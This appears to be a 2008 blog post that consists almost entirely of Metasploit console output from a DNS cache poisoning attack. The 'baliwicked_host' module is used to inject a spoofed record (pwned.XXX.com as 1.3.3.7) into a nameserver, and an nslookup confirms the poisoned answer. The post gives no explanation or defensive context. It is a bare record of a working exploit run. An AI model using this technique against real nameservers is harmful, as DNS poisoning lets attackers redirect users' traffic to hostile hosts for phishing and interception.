Wednesday, July 23, 2008

Jeepers.

msf auxiliary(baliwicked_host) > exploit
[*] Targeting nameserver x.x.x.x for injection of pwned.XXX.com. as 1.3.3.7
[*] Querying recon nameserver for XXX.com.'s nameservers...
[*] Got an NS record: XXX.com. 258801 IN NS ns1.XXX.com.
[*] Querying recon nameserver for address of ns1.XXX.com....
[*] Got an A record: ns1.XXX.com. 258801 IN A x.x.x.x
[*] Checking Authoritativeness: Querying x.x.x.x for XXX.com....
[*] ns1.XXX.com. is authoritative for XXX.com., adding to list of nameservers to spoof as
[*] Attempting to inject a poison record for pwned.XXX.com. into x.x.x.x:34649...
[*] Sent 1000 queries and 10000 spoofed responses...
[*] Sent 2000 queries and 20000 spoofed responses...
[*] Poisoning successful after 2250 attempts: pwned.XXX.com == 1.3.3.7
[*] Auxiliary module execution completed


$ nslookup.exe pwned.XXX.com pwned.nameserver.com
Server: pwned.nameserver.com
Address: x.x.x.x

Non-authoritative answer:
Name: pwned.XXX.com
Address: 1.3.3.7

No comments: